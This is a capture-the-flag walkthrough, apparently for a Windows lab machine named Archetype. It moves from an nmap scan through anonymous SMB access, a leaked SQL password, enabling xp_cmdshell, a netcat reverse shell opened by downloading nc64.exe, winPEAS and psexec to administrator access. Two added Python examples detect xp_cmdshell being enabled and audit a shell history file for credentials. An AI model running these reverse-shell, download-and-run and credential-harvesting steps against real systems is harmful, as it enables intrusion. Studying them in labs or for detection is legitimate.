Archetype

#smbclient #ms-sql-server #impacket

nmap -sV -sC <ip_target>
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 15:37 WIB
Nmap scan report for 10.129.106.221
Host is up (0.37s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
1078/tcp  filtered avocent-proxy
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-01-24T01:47:56
|_Not valid after:  2052-01-24T01:47:56
|_ssl-date: 2022-01-24T01:50:29+00:00; -6h48m24s from scanner time.
10012/tcp filtered unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-01-24T01:50:12
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-23T17:50:14-08:00
| ms-sql-info:
|   10.129.106.221:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_clock-skew: mean: -5h12m23s, deviation: 3h34m41s, median: -6h48m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.05 seconds

SMB is open, as is Microsoft SQL Server 2017.

  1. Enumerate SMB with smbclient
smbclient -N -L \\\\<ip_target>

-N : No password
-L : This option allows you to look at what services are available on a server

The share that can be accessed this way is backups

smbclient -N \\\\<ip_target>\\backups
smb: \> dir
smb: \> get prod.dtsConfig
cat prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc

  2. Enumerate MS-SQL Server

Impacket includes a valuable Python script called mssqlclient.py which offers this functionality.
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and, for some protocols (e.g. SMB1-3 and MSRPC), the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object-oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

https://github.com/SecureAuthCorp/impacket

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt

All the scripts used below are run from the impacket folder

python3 mssqlclient.py -h
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
SQL> help

https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

Check which role we hold on the server

SQL> SELECT is_srvrolemember('sysadmin');

Check whether xp_cmdshell is enabled, since it is usually disabled by default

SQL> EXEC xp_cmdshell 'net user';

Enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; -- enabling sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
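Each sp_configure change in the sequence above is written to the SQL Server ERRORLOG as message 15457 ("Configuration option '...' changed from X to Y."). As an added example, not from the original write-up, the detector below parses those lines and raises an alert whenever xp_cmdshell goes from 0 to 1, noting whether the same spid unlocked 'show advanced options' just before, which is exactly the two-step sequence shown above. The log lines are constructed to mirror that message format; timestamps and spids are made up.

```python
"""Detect xp_cmdshell being enabled through sp_configure in SQL Server ERRORLOG lines."""
import re

# Constructed ERRORLOG lines mirroring SQL Server message 15457
# ("Configuration option '...' changed from X to Y."); timestamps and spids are made up.
SAMPLE_ERRORLOG = """\
2022-01-24 01:49:58.11 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-01-24 01:50:01.27 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-01-24 02:10:44.90 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-01-24 02:11:02.05 spid60      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

def parse_config_changes(log_text):
    """Yield one dict per configuration-change message; other lines are ignored."""
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            ev = m.groupdict()
            ev["old"], ev["new"] = int(ev["old"]), int(ev["new"])
            yield ev

def detect_xp_cmdshell_enablement(log_text):
    """Alert on every xp_cmdshell 0 -> 1 change, and record whether the same spid
    unlocked 'show advanced options' first: the exact sp_configure sequence above."""
    unlocked = set()
    alerts = []
    for ev in parse_config_changes(log_text):
        if ev["option"] == "show advanced options":
            if ev["new"] == 1:
                unlocked.add(ev["spid"])
            else:
                unlocked.discard(ev["spid"])
        elif ev["option"] == "xp_cmdshell" and ev["old"] == 0 and ev["new"] == 1:
            alerts.append({"time": ev["ts"], "spid": ev["spid"],
                           "same_session_unlocked_advanced_options": ev["spid"] in unlocked})
    return alerts

if __name__ == "__main__":
    for a in detect_xp_cmdshell_enablement(SAMPLE_ERRORLOG):
        print(f"{a['time']} {a['spid']}: xp_cmdshell enabled "
              f"(advanced options unlocked by same spid: {a['same_session_unlocked_advanced_options']})")
```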

Check

SQL> xp_cmdshell "whoami"

  3. Reverse Shell

Concept

1. Upload nc64.exe to the server
2. Execute cmd.exe bound to the listener

http server (local) -> server -> listener (local)

nc64.exe

Open a terminal

sudo python3 -m http.server 80

new terminal tab

sudo nc -lvnp 443

We will use PowerShell because it has more features, so each execution takes the form powershell -c <command>

SQL> xp_cmdshell "powershell -c pwd"

User flag

C:\Users\sql_svc\Desktop

Place it in a directory that an ordinary user can write to

SQL> xp_cmdshell "powershell -c dir C:\Users"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://<ip_local>/nc64.exe -outfile nc64.exe"

*Don't forget to allow port 80 locally (Linux ufw):

sudo ufw allow 80

Bind cmd.exe to the local listener

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe <ip_local> 443"

  4. Privilege Escalation

Windows privilege escalation, using the winPEAS tool

Send it to the target machine

powershell
wget http://10.10.14.9/winPEASx64.exe -outfile winPEASx64.exe

Run

PS C:\Users\sql_svc\Downloads> .\winPEASx64.exe

Back in the listener shell

cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
type ConsoleHost_history.txt

The admin username and password are obtained from the history file
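The privilege escalation works because a command containing the administrator's password was recorded in the PSReadLine history file. As an added example, not from the original write-up, the audit below scans a ConsoleHost_history.txt for the common ways credentials end up there (net use with /user: followed by a password, a -Password argument, ConvertTo-SecureString -AsPlainText) and reports each hit with the secret masked. The history lines, host name, accounts and passwords are constructed placeholders, not the box's actual contents.

```python
"""Audit a PSReadLine ConsoleHost_history.txt for commands that carry credentials inline."""
import re

# Constructed history lines; host, user names and passwords are placeholders, not from the box.
SAMPLE_HISTORY = """\
Get-ChildItem C:\\backups
net.exe use T: \\\\FILESRV\\backups /user:administrator Placeholder_P@ss1
Set-Location C:\\Users\\Public
$s = ConvertTo-SecureString 'Placeholder_P@ss2' -AsPlainText -Force
Invoke-Sqlcmd -ServerInstance . -Username sa -Password Placeholder_P@ss3 -Query 'select 1'
whoami /priv
"""

QUOTED_OR_WORD = r"(?P<secret>\"[^\"]*\"|'[^']*'|\S+)"
RULES = [
    ("net use with /user: and inline password",
     re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+" + QUOTED_OR_WORD, re.I)),
    ("-Password argument", re.compile(r"-Password\s+" + QUOTED_OR_WORD, re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+" + QUOTED_OR_WORD + r".*-AsPlainText", re.I)),
]

def mask(secret):
    """Strip quotes and keep only the first character so the report never re-leaks it."""
    s = secret.strip("'\"")
    return s[:1] + "*" * (len(s) - 1)

def audit_history(history_text):
    """Return one finding per history line that matches a credential rule (first rule wins)."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        for rule, pattern in RULES:
            m = pattern.search(line)
            if m:
                findings.append({"line": lineno, "rule": rule,
                                 "user": m.groupdict().get("user"),
                                 "secret_masked": mask(m.group("secret"))})
                break
    return findings

if __name__ == "__main__":
    for f in audit_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['rule']} (user={f['user']}, secret={f['secret_masked']})")
```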

Open a new terminal

python3 psexec.py administrator@{TARGET_IP}

Root flag

C:\Users\Administrator\Desktop